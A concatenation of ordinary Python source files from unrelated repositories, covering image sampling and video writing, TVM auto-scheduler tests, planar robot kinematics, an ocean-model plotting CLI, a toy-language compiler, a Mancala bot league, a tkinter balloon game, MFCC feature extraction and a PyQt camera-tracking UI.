def get_sub_pxl_values(img, ys, xs):
# img: h x w x c, [0, 1], np.float32
h, w, c = img.shape
xs0, ys0, xs1, ys1 = xs.astype(int), ys.astype(int), xs.astype(int) + 1, ys.astype(int) + 1
xs1 = np.clip(xs1, a_min=0, a_max=w - 1)
ys1 = np.clip(ys1, a_min=0, a_max=h - 1)
dx = (xs - xs0).astype(np.float32)
dy = (ys - ys0).astype(np.float32)
weight_tl = (1.0 - dx) * (1.0 - dy)
weight_tr = (dx) * (1.0 - dy)
weight_bl = (1.0 - dx) * (dy)
weight_br = (dx) * (dy)
weight_tl = np.expand_dims(weight_tl, axis=-1)
weight_tr = np.expand_dims(weight_tr, axis=-1)
weight_bl = np.expand_dims(weight_bl, axis=-1)
weight_br = np.expand_dims(weight_br, axis=-1)
pxl_values = weight_tl * img[ys0, xs0, :] + \
weight_tr * img[ys0, xs1, :] + \
weight_bl * img[ys1, xs0, :] + \
weight_br * img[ys1, xs1, :]
return pxl_values
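# Example (illustrative): bilinear sampling of a constant image returns the
# constant value at every requested sub-pixel location, e.g.
#   get_sub_pxl_values(np.ones((4, 4, 3), np.float32),
#                      ys=np.array([1.5]), xs=np.array([2.25]))
# gives array([[1., 1., 1.]], dtype=float32).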
class VideoWriter:
def __init__(self, fname='./demo.mp4',
h=760, w=1280,
frame_rate=10, bottom_crop=False,
layout='default', display=True):
self.w = int(w)
self.h = int(h)
self.bottom_crop = bottom_crop
self.layout = layout
self.display = display
self.bottom_crop = bottom_crop
self.video_writer = cv2.VideoWriter(
fname, cv2.VideoWriter_fourcc(*'MP4V'), frame_rate,
(self.w, self.h))
def write_frame(self, img_after, img_before=None, idx=None):
if img_after.shape[0] != self.h or img_after.shape[1] != self.w:
img_after = cv2.resize(img_after, (self.w, self.h))
if img_before is not None:
img_before = cv2.resize(img_before, (self.w, self.h))
if self.layout == 'default':
img = img_after
if self.layout == 'transfer':
img = np.zeros_like(img_after)
start_frame_id, end_frame_dx = 20, 40
s = int((idx - start_frame_id) / (end_frame_dx - start_frame_id) * self.w)
s = np.clip(s, a_min=0, a_max=self.w)
img[:, 0:s, :] = img_after[:, 0:s, :]
img[:, s:, :] = img_before[:, s:, :]
frame = img[:,:,::-1]
if self.bottom_crop:
h_crop = int(self.h * 0.9)
frame = cv2.resize(frame[:h_crop, :, :], (self.w, self.h))
self.video_writer.write(frame)
if self.display:
cv2.imshow('frame', frame)
cv2.waitKey(1)
``` |
{
"source": "jiuqi-yang/dev-tvm",
"score": 2
} |
#### File: python/unittest/test_auto_scheduler_compute_dag.py
```python
import tvm, topi
from tvm import auto_scheduler, te
from test_auto_scheduler_common import get_tiled_matmul, matmul_auto_scheduler_test
def test_apply_steps():
dag, s = get_tiled_matmul()
dag.print_python_code_from_state(s)
sch, tensors = dag.apply_steps_from_state(s)
stmt = tvm.lower(sch, tensors, simple_mode=True)
def test_infer_bound():
dag, s = get_tiled_matmul()
s = dag.infer_bound_from_state(s)
def test_estimate_flop():
N = 512
A, B, C = matmul_auto_scheduler_test(N, N, N)
dag = auto_scheduler.ComputeDAG([A, B, C])
assert abs(dag.flop_ct - 2 * N ** 3) < 0.5
D = topi.nn.relu(C)
dag = auto_scheduler.ComputeDAG([A, B, D])
assert abs(dag.flop_ct - 2 * N ** 3 - N * N) < 0.5
# should not count the comparison operations in padding
D = topi.nn.pad(C, [1, 1])
dag = auto_scheduler.ComputeDAG([A, B, D])
assert abs(dag.flop_ct - 2 * N ** 3) < 0.5
if __name__ == "__main__":
test_apply_steps()
test_infer_bound()
test_estimate_flop()
``` |
{
"source": "JiuSenso/robotic-kinamatics-matlab-script",
"score": 3
} |
#### File: planar_robot_kinematics/python_planar_kinematics/planar_robot.py
```python
from numpy import *
from math import atan2
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def rad2deg(a):
if type(a)==int or type(a)==float: return a*(180/pi)
if type(a)==list:
for i in range(0, len(a)): a[i] *= (180/pi)
return a
def deg2rad(a):
if type(a)==int or type(a)==float: return a*(pi/180)
if type(a)==list:
for i in range(0, len(a)): a[i] *= (pi/180)
return a
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def denavit_hartemberg(DH_table_row):
a = DH_table_row[0] # displacement along x axis
alpha = DH_table_row[2] # rotation along x axis
d = DH_table_row[2] # displacement along z axis
theta = DH_table_row[3] # rotation along z axis
# Denavit-Hartemberg transformation matrix
DH = array([ [cos(theta), -sin(theta), 0, a*cos(theta)],
[sin(theta), cos(theta), 0, a*sin(theta)],
[0, 0, 1, d ],
[0, 0, 0, 1 ],
])
return DH
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
class planar_robot:
def __init__(self, link):
self.n = len(link) # joint number
self.l = link # link length
self.q = [] # joint angle
for i in range(0,len(link)):
self.q.append(0.)
self.TOE = [] # Origin to end-effector transformation matrix
def get_end_effector_pos(self):
return [self.TOE[0][3], self.TOE[1][3], self.TOE[2][3]]
def direct_kinematics(self, q):
# params error check
if len(q) != self.n:
return -1
else: self.q= q
a = self.l # displacement along x axis
alpha = zeros(self.n) # rotation along x axis
d = zeros(self.n) # displacement along z axis
theta = deg2rad(q) # rotation along z axis
# build DH table [a, alpha, d, theta]
DH_table = []
for row in range(0,self.n): DH_table.append( [a[row], alpha[row], d[row], theta[row]] )
# Compute Transformation matrices between consecutive frames
A = []
for row in range(0,self.n): A.append(eye(4))
for i in range(0,self.n):
A[i] = denavit_hartemberg(DH_table[i])
# Compute transformation matrix from O to e-e
TOE = I = eye(4) #from origin to end effector
for i in range(0,self.n) : TOE = TOE @ A[i]
for i in range(0,4):
for j in range(0,4):
TOE[i][j] = round(TOE[i][j], 3)
self.TOE = TOE
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def RR_inverse_kinematics(self, p):
px = p[0]
py = p[1]
#pz = p[2]
if (px*px + py*py) >= (self.l[0]*self.l[0] + self.l[1]*self.l[1] + 2*self.l[0]*self.l[1]):
return -1
c2 = (px*px + py*py - self.l[0]*self.l[0] - self.l[1]*self.l[1]) / (2*self.l[0]*self.l[1])
s2_pos = sqrt(1 - c2*c2)
s2_neg = -sqrt(1 - c2*c2)
q2_pos = atan2(s2_pos, c2)
q1_pos = atan2( py*(self.l[0]+self.l[1]*c2) - px*self.l[1]*s2_pos , px*(self.l[0]+self.l[1]*c2) + py*self.l[1]*s2_pos )
q2_neg = atan2(s2_neg, c2)
q1_neg = atan2( py*(self.l[0]+self.l[1]*c2) - px*self.l[1]*s2_neg , px*(self.l[0]+self.l[1]*c2) + py*self.l[1]*s2_neg )
return [[round(rad2deg(q1_pos),4), round(rad2deg(q2_pos),4)], [round(rad2deg(q1_neg),4), round(rad2deg(q2_neg),4)] ]
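#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# Minimal usage sketch (illustrative): a 2R arm with unit link lengths,
# joint angles in degrees; the values below are arbitrary examples.
if __name__ == "__main__":
    rr = planar_robot([1.0, 1.0])
    rr.direct_kinematics([30.0, 45.0]) # forward kinematics fills rr.TOE
    ee = rr.get_end_effector_pos()
    print("end effector:", ee)
    print("IK solutions:", rr.RR_inverse_kinematics(ee[0:2]))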
``` |
{
"source": "JiuShiNewBee/mypyfesom2",
"score": 3
} |
#### File: newver_202009/pyfesom2/pfplot.py
```python
import argparse
import cmocean.cm as cmo
import matplotlib.pylab as plt
import numpy as np
from .load_mesh_data import get_data, load_mesh
from .pfinterp import parse_depths, parse_timesteps, parse_years
# import matplotlib as mpl
# mpl.use('Qt5Agg')
from .plotting import plot
def pfplot():
parser = argparse.ArgumentParser(
prog="pfplot", description="Plot FESOM2 data on the map."
)
parser.add_argument("meshpath", help="Path to the mesh folder")
parser.add_argument("result_path", help="Path to the results")
parser.add_argument(
"variable", default="temp", help="Name of the variable inside the file"
)
parser.add_argument(
"--years",
"-y",
default="1948",
type=str,
help="Years as a string. Options are one year, coma separated years, or range in a form of 1948:2000.",
)
parser.add_argument("--depth", "-d", default=0, type=float, help="Depth in meters.")
parser.add_argument(
"--box",
"-b",
nargs=4,
type=float,
default=[-180.0, 180.0, -80.0, 90.0],
help="Map boundaries in -180 180 -90 90 format that will be used for interpolation.",
metavar=("LONMIN", "LONMAX", "LATMIN", "LATMAX"),
)
parser.add_argument(
"--res",
"-r",
nargs=2,
type=int,
default=(360, 170),
help="Number of points along each axis that will be used for interpolation (for lon and lat).",
metavar=("N_POINTS_LON", "N_POINTS_LAT"),
)
parser.add_argument(
"--influence",
"-i",
default=80000,
type=float,
help="Radius of influence for interpolation, in meters.",
)
parser.add_argument(
"--timestep",
"-t",
default=0,
type=int,
help="Index of the timstep from netCDF variable, strats with 0.",
)
parser.add_argument(
"--levels",
"-l",
nargs=3,
type=float,
help="Levels for contour plot in format min max numberOfLevels.\
If not provided min/max values from data will be used with 40 levels.",
metavar=("START", "STOP", "NUMBER"),
)
parser.add_argument(
"--quiet",
"-q",
action="store_true",
help="If present additional information will not be printed.",
)
parser.add_argument(
"--ofile",
"-o",
type=str,
help="Path to the output figure. If present the image\
will be saved to the file instead of showing it. ",
)
parser.add_argument(
"--mapproj",
"-m",
choices=["merc", "pc", "np", "sp", "rob"],
default="rob",
help="Map projection. Options are Mercator (merc), Plate Carree (pc), North Polar Stereo (np), South Polar Stereo (sp), Robinson (rob)",
)
parser.add_argument(
"--abg",
nargs=3,
type=float,
default=(0.0, 0.0, 0.0),
help="Alpha, beta and gamma Euler angles. If you plots look rotated, you use wrong abg values. Usually nessesary only during the first use of the mesh.",
)
parser.add_argument(
"--cmap",
default="Spectral_r",
help="Name of the colormap from cmocean package or from the standard matplotlib set. By default `Spectral_r` will be used for property plots and `balance` for bias plots.",
)
parser.add_argument(
"--interp",
choices=["nn", "idist", "linear", "cubic"],
default="nn",
help="Interpolation method. Options are nn - nearest neighbor (KDTree implementation, fast), idist - inverse distance (KDTree implementation, decent speed), linear (scipy implementation, slow) and cubic (scipy implementation, slowest and give strange results on corarse meshes).",
)
parser.add_argument(
"--ptype",
choices=["cf", "pcm"],
default="cf",
help="Plot type. Options are contourf ('cf') and pcolormesh ('pcm')",
)
parser.add_argument(
"-k",
type=int,
default=5,
help="k-th nearest neighbors to use. Only used when interpolation method (--interp) is idist",
)
args = parser.parse_args()
# args.func(args)
if not args.quiet:
print("Mesh path: {}".format(args.meshpath))
print("Input file path: {}".format(args.result_path))
print("Name of the variable: {}".format(args.variable))
print("Years: {}".format(args.years))
print("Depth: {}".format(args.depth))
print("Bounding box: {}".format(args.box))
print("Number of points along sides: {}".format(args.res))
print("Radius of influence (in m.): {}".format(args.influence))
print("Nearest neighbors to use: {}".format(args.k))
print("Timestep index: {}".format(args.timestep))
print("Contour plot levels: {}".format(args.levels))
print("Quiet?: {}".format(args.quiet))
print("Output file for image: {}".format(args.ofile))
print("Map projection: {}".format(args.mapproj))
print("Euler angles of mesh rotation: {}".format(args.abg))
# print("File with climatology: {}".format(args.clim))
print("Name of the color map: {}".format(args.cmap))
print("Interpolation method: {}".format(args.interp))
print("Plot type: {}".format(args.ptype))
print(args.cmap)
if args.cmap:
colormap = args.cmap
else:
colormap = "Spectral_r"
mesh = load_mesh(args.meshpath, abg=args.abg, usepickle=True, usejoblib=False)
years = parse_years(args.years)
data = get_data(
result_path=args.result_path,
variable=args.variable,
years=years,
mesh=mesh,
runid="fesom",
records=-1,
depth=float(args.depth),
how="mean",
ncfile=None,
        compute=True,
    )
fig = plot(
mesh=mesh,
data=data,
cmap=colormap,
influence=args.influence,
box=args.box,
res=args.res,
interp=args.interp,
mapproj=args.mapproj,
levels=args.levels,
ptype=args.ptype,
units=None,
figsize=(10, 5),
rowscol=(1, 1),
titles=None,
distances_path=None,
inds_path=None,
qhull_path=None,
basepath=None,
)
plt.show()
if __name__ == "__main__":
pfplot()
``` |
{
"source": "Jiusoft/cpc",
"score": 3
} |
#### File: Jiusoft/cpc/main.py
```python
import sys
import os
from shutil import rmtree
from subprocess import Popen
args = sys.argv[1:]
def escape(string):
toreturn=""
for char in string:
if char=="\"" or char=="(" or char==")":
char=f"\\{char}"
toreturn+=char
else:
toreturn+=char
return toreturn
def shell():
while True:
cmd=input(">>> ")
os.system(f"py {escape(toPython(cmd))}")
def compile():
filename = args[0].split("/")[-1].split(".")[0]
with open(filename + ".py", 'a+') as f:
f.write(
"import socket\nimport os\nimport math\nimport sys\nhostname=socket.gethostname("
")\nhostip=socket.gethostbyname(hostname)\n")
with open(args[0], 'r') as f:
for line in f.readlines():
toAppend = toPython(line)
with open(filename + ".py", 'a') as nf:
nf.write(toAppend + "\n")
compiletoSystem = Popen(["python3", "-m", "PyInstaller", filename + ".py", "--onefile", "--distpath", "."])
compiletoSystem.wait()
rmtree("build")
os.remove(filename + ".spec")
os.remove(filename + ".py")
def checkindent(code, indent=0):
if code.startswith(" "):
indent += 1
code = code[1:]
if code.startswith(" "):
            return checkindent(code, indent=indent)
else:
return indent
def toPython(code):
if code == "\n":
return "\n"
elif code.startswith("#addmod "):
try:
if code.split(" ")[1] == "libguimod\n":
return "import tkinter as tk"
else:
return 'print(\"ERROR: No such module!\")'
except IndexError:
            return 'print(\"ERROR: Syntax for adding module is \\"#addmod MODULE\\"\")'
else:
if checkindent(code) is None:
indent = 0
else:
indent = checkindent(code)
to_return = ""
tmp = list(code)
tmp1 = []
for item in tmp:
if item != "\\":
tmp1.append(item)
else:
tmp1.append("escape")
for item in tmp1:
if item == "escape":
i = tmp1.index(item)
del tmp1[i]
del tmp1[i]
command_list = "".join(tmp1).split()
main = command_list[0]
del tmp, tmp1
if main == "putln":
to_return = "print(" + " ".join(command_list[1:]) + ")"
if main == "getinput":
to_return = "inputresult = input(" + " ".join(command_list[1:]) + ")"
if "=" in command_list:
to_return = " ".join(command_list)
if main == "IF":
if not command_list[-1] == "THEN":
to_return = 'print(\"ERROR: \\"THEN\\" expected\")'
else:
condition = command_list[1:-1]
if len(condition) != 3 or not (condition[1] in ["<", "<=", "==", ">=", ">"]):
to_return = 'print(\"ERROR: If then condition syntax must be: \\"IF <var> </<=/==/>=/> <var> ' \
'THEN\\"\")'
else:
to_return = 'if ' + " ".join(condition) + ":"
if main == "ELSE":
to_return = "else:"
for i in range(indent):
to_return = "\t" + to_return
return to_return
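# Illustrative translations produced by toPython (following the rules above):
#   'putln "hello"' -> 'print("hello")'
#   'IF x == y THEN' -> 'if x == y:'
#   'ELSE' -> 'else:'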
if len(args)==0:
shell()
elif len(args)==1:
compile()
else:
print("Sorry, but cpc can only handle one argument at this moment. ")
``` |
{
"source": "Jiusoft/tkinter-balloon-game",
"score": 3
} |
#### File: Jiusoft/tkinter-balloon-game/main.py
```python
import tkinter as tk
from random import randint
from time import sleep
from threading import Thread
from playsound import playsound
root = tk.Tk()
root.wm_title('Balloon game - Jiusoft')
fullscreen = False
def enter_fullscreen():
global fullscreen
fullscreen = True
fullscreen_button['text'] = 'Exit fullscreen'
root.attributes('-fullscreen', True)
def exit_fullscreen():
global fullscreen
fullscreen = False
    fullscreen_button['text'] = 'Enter fullscreen'
root.attributes('-fullscreen', False)
def enter_or_exit_fullscreen():
if fullscreen:
exit_fullscreen()
elif not fullscreen:
enter_fullscreen()
fullscreen_button = tk.Button(master=root, text='', command=enter_or_exit_fullscreen)
fullscreen_button.pack(side=tk.RIGHT, anchor=tk.NE)
enter_fullscreen()
score_label = tk.Label(master=root, text='Score: 0')
def set_score(score: int):
score_label['text'] = f'Score: {score}'
score_label.pack(side=tk.TOP, fill=tk.X)
play_area = tk.Canvas(master=root, bg='snow', width=750, height=750)
play_area.pack(side=tk.TOP)
score = 0
def increase_score(evt):
global score
score += 1
set_score(score)
def play_pop():
playsound('Pop.mp3', True)
Thread(target=play_pop).start()
def create_rectangle_in_random_spot():
previous_rectangle = None
try:
for _ in range(20):
if previous_rectangle is not None:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1.5)
for _ in range(30):
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1)
while True:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(0.5)
except RuntimeError:
pass
Thread(target=create_rectangle_in_random_spot).start()
root.mainloop()
``` |
{
"source": "jiuthree/speaker_recognition",
"score": 3
} |
#### File: jiuthree/speaker_recognition/features.py
```python
import sys
#from python_speech_features import mfcc
import numpy as np
# switched to the mfcc implementation from the spafe.features.mfcc library
from spafe.features.mfcc import mfcc
def get_feature(fs, signal):
    num_ceps = 13
low_freq = 0
high_freq = 2000
nfilts = 24
nfft = 512
    dct_type = 2
    use_energy = False
lifter = 5
normalize = False
mfcc_feature = mfcc(sig=signal,fs= fs, num_ceps=num_ceps, nfilts=nfilts, nfft=nfft, low_freq=low_freq, high_freq=high_freq,
dct_type=dct_type, use_energy=use_energy, lifter=lifter, normalize=normalize)
# mfcc_feature = mfcc(signal, fs)
if len(mfcc_feature) == 0:
        print("ERROR.. failed to extract mfcc feature:", len(signal), file=sys.stderr)
return mfcc_feature
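# Minimal usage sketch (illustrative): the wav path below is a placeholder and
# the recording is assumed to be a mono PCM file readable by scipy.
if __name__ == "__main__":
    from scipy.io import wavfile
    fs, signal = wavfile.read("example_speaker.wav") # hypothetical file
    feats = get_feature(fs, signal)
    print(feats.shape) # (num_frames, num_ceps) MFCC matrix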
``` |
{
"source": "Jiuxe/mancala-league",
"score": 2
} |
#### File: mancala-league/app/league.py
```python
import subprocess
from multiprocessing import Pool
import os
import glob
import logging
import time
from threading import Thread
from functools import reduce
from collections import namedtuple
import pandas as pd
from app.utilities import extract_numbers
from app.constants import *
from datetime import datetime, timedelta
is_running_competition = False
def process_output(p1, p2, output):
    """ Return a list with the match information """
lines = output.split('\n')
digit = -1
for line in lines:
timeout_error = line.endswith('proporcionar una acción.')
connection_error = line.startswith('No hay comunicación')
if timeout_error or connection_error:
digit = extract_numbers(line)[0]
break
if digit == 1:
return [p1, p2, 0, 48, 0, 0, True, False]
elif digit == 2:
return [p1, p2, 48, 0, 0, 0, False, True]
else:
digits = [extract_numbers(line) for line in lines[-7:-1]]
return [p1, p2, digits[0][1], digits[2][1],
digits[1][1], digits[3][1], False, False]
def run_match(p1, p2):
"""
Run a match between p1 and p2.
Returns a MatchData with the relevant data of the match.
"""
p1_name = os.path.basename(p1)
p2_name = os.path.basename(p2)
logging.info('{} vs {}'.format(p1_name, p2_name))
command = MANCALA_COMMAND.format(p1, p2)
res = subprocess.check_output(command, shell=True).decode('utf-8')
match_data = process_output(p1_name, p2_name, res)
return match_data
def create_matches_table(content):
""" Returns a DataFrame based on matches data. """
cols = ['Player 1', 'Player 2', 'Points P1',
'Points P2', 'Time(ms) P1', 'Time(ms) P2',
'Timeouts P1', 'Timeouts P2']
return pd.DataFrame(content, columns=cols)
def create_ranking_table(table):
""" Convert a matches table into a DataFrame with the ranking of bots
based on wins and total points.
"""
tables = []
for a, b in [(1, 2), (2, 1)]:
p1_col = 'Player {}'.format(a)
p2_col = 'Player {}'.format(b)
p1_points_col = 'Points P{}'.format(a)
p2_points_col = 'Points P{}'.format(b)
p1_time_col = 'Time(ms) P{}'.format(a)
p2_time_col = 'Time(ms) P{}'.format(b)
p1_timeouts_col = 'Timeouts P{}'.format(a)
p2_timeouts_col = 'Timeouts P{}'.format(b)
# Extending data for wins, ties and defeats
df = table.set_index(p1_col).drop(
[p2_col, p2_time_col, p2_timeouts_col], axis=1)
df[p1_time_col] /= 1000
df['Wins'] = (df[p1_points_col] > df[p2_points_col]).astype(int)
df['Defeats'] = (df[p1_points_col] < df[p2_points_col]).astype(int)
df['Ties'] = (df[p1_points_col] == df[p2_points_col]).astype(int)
df[p1_timeouts_col] = df[p1_timeouts_col].astype(int)
df = df.groupby(p1_col).sum()
# Renaming columns and index
df.index.names = ['Bot']
df = df.rename(columns={p1_points_col: 'Seeds for',
p2_points_col: 'Seeds against',
p1_time_col: 'Total Time(s)',
p1_timeouts_col: 'Total Timeouts'})
tables.append(df)
# Merge all tables
result = reduce(lambda x, y: x.add(y, fill_value=0), tables)
# Create Points columns based on wins and ties.
result['Points'] = result['Wins'] * 3 + result['Ties']
result = result.reindex(columns=['Points', 'Wins', 'Defeats', 'Ties',
'Seeds for', 'Seeds against',
'Total Timeouts', 'Total Time(s)'])
# Ranking bots
result = result.sort_values(by=['Points', 'Seeds for', 'Total Time(s)'],
ascending=False)
result.index += 1
return result
def run_competition(block_thread=True):
global is_running_competition
if is_running_competition:
return False
def inner():
global is_running_competition
is_running_competition = True
logging.info('Ejecutando competicion')
bot_list = glob.glob('{}/*'.format(BOTS_FOLDER))
match_list = [(p1, p2)
for p1 in bot_list for p2 in bot_list if p1 != p2]
with Pool() as p:
match_data = p.starmap(run_match, match_list)
matches_table = create_matches_table(match_data)
ranking = create_ranking_table(matches_table)
matches_table.set_index(
matches_table.columns[0]).to_csv(MATCHES_CSV)
ranking.to_csv(RANKING_CSV)
is_running_competition = False
logging.info('Competición terminada')
if block_thread:
inner()
else:
Thread(target=inner).start()
return True
def get_current_data():
exec_date = time.ctime((os.stat(RANKING_CSV).st_mtime))
ranking = pd.read_csv(RANKING_CSV)
matches = pd.read_csv(MATCHES_CSV)
return (exec_date, ranking, matches)
def get_next_execution():
now = datetime.now()
lapse = 24 / EXECUTIONS_PER_DAY
next_hour = now + timedelta(hours=lapse - now.hour % lapse)
return next_hour.strftime('%Y-%m-%d %H:00:00')
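# Example (illustrative): rank two bots from a couple of hand-written results
# using only the helpers defined above.
#   rows = [['bot_a', 'bot_b', 30, 18, 1200, 1500, False, False],
#           ['bot_b', 'bot_a', 25, 23, 900, 1100, False, False]]
#   ranking = create_ranking_table(create_matches_table(rows))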
``` |
{
"source": "jiuya/TrackingCamera",
"score": 2
} |
#### File: TrackingCamera/ball_tracking/ball_tracking_ui.py
```python
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Qt_CV_MainWindow(object):
def setupUi(self, Qt_CV_MainWindow):
Qt_CV_MainWindow.setObjectName(_fromUtf8("Qt_CV_MainWindow"))
Qt_CV_MainWindow.resize(660, 283)
Qt_CV_MainWindow.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
Qt_CV_MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight)
self.centralwidget = QtGui.QWidget(Qt_CV_MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(20, 90, 501, 141))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout_3.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.verticalLayout_3.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_3.addWidget(self.label)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setSizeConstraint(QtGui.QLayout.SetMinimumSize)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.horizontalLayout_2.addWidget(self.label_2)
self.H_lcd = QtGui.QLCDNumber(self.verticalLayoutWidget)
self.H_lcd.setObjectName(_fromUtf8("H_lcd"))
self.horizontalLayout_2.addWidget(self.H_lcd)
self.H_edit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.H_edit.setObjectName(_fromUtf8("H_edit"))
self.horizontalLayout_2.addWidget(self.H_edit)
self.H_slider = QtGui.QSlider(self.verticalLayoutWidget)
self.H_slider.setMaximum(180)
self.H_slider.setOrientation(QtCore.Qt.Horizontal)
self.H_slider.setObjectName(_fromUtf8("H_slider"))
self.horizontalLayout_2.addWidget(self.H_slider)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_3.addWidget(self.label_3)
self.S_lcd = QtGui.QLCDNumber(self.verticalLayoutWidget)
self.S_lcd.setObjectName(_fromUtf8("S_lcd"))
self.horizontalLayout_3.addWidget(self.S_lcd)
self.S_edit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.S_edit.setObjectName(_fromUtf8("S_edit"))
self.horizontalLayout_3.addWidget(self.S_edit)
self.S_slider = QtGui.QSlider(self.verticalLayoutWidget)
self.S_slider.setMaximum(61)
self.S_slider.setOrientation(QtCore.Qt.Horizontal)
self.S_slider.setObjectName(_fromUtf8("S_slider"))
self.horizontalLayout_3.addWidget(self.S_slider)
self.verticalLayout_3.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtGui.QHBoxLayout()
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.horizontalLayout_4.addWidget(self.label_4)
self.V_lcd = QtGui.QLCDNumber(self.verticalLayoutWidget)
self.V_lcd.setObjectName(_fromUtf8("V_lcd"))
self.horizontalLayout_4.addWidget(self.V_lcd)
self.V_edit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.V_edit.setObjectName(_fromUtf8("V_edit"))
self.horizontalLayout_4.addWidget(self.V_edit)
self.V_slider = QtGui.QSlider(self.verticalLayoutWidget)
self.V_slider.setMaximum(254)
self.V_slider.setOrientation(QtCore.Qt.Horizontal)
self.V_slider.setObjectName(_fromUtf8("V_slider"))
self.horizontalLayout_4.addWidget(self.V_slider)
self.verticalLayout_3.addLayout(self.horizontalLayout_4)
self.verticalLayoutWidget_2 = QtGui.QWidget(self.centralwidget)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(530, 100, 91, 121))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetNoConstraint)
self.verticalLayout.setContentsMargins(-1, 1, -1, 1)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.exec_button = QtGui.QPushButton(self.verticalLayoutWidget_2)
self.exec_button.setMinimumSize(QtCore.QSize(80, 60))
self.exec_button.setObjectName(_fromUtf8("exec_button"))
self.verticalLayout.addWidget(self.exec_button)
self.horizontalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(260, 10, 91, 80))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.show_button = QtGui.QPushButton(self.horizontalLayoutWidget)
self.show_button.setObjectName(_fromUtf8("show_button"))
self.horizontalLayout.addWidget(self.show_button)
self.verticalLayoutWidget.raise_()
self.verticalLayoutWidget_2.raise_()
self.horizontalLayoutWidget.raise_()
Qt_CV_MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(Qt_CV_MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 660, 24))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
Qt_CV_MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(Qt_CV_MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
Qt_CV_MainWindow.setStatusBar(self.statusbar)
self.actionQuit = QtGui.QAction(Qt_CV_MainWindow)
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(Qt_CV_MainWindow)
QtCore.QObject.connect(self.actionQuit, QtCore.SIGNAL(_fromUtf8("triggered()")), Qt_CV_MainWindow.close)
QtCore.QObject.connect(self.H_slider, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.H_lcd.display)
QtCore.QObject.connect(self.H_edit, QtCore.SIGNAL(_fromUtf8("textChanged(QString)")), self.H_lcd.display)
QtCore.QObject.connect(self.V_slider, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.V_lcd.display)
QtCore.QObject.connect(self.V_edit, QtCore.SIGNAL(_fromUtf8("textChanged(QString)")), self.V_lcd.display)
QtCore.QObject.connect(self.S_slider, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.S_lcd.display)
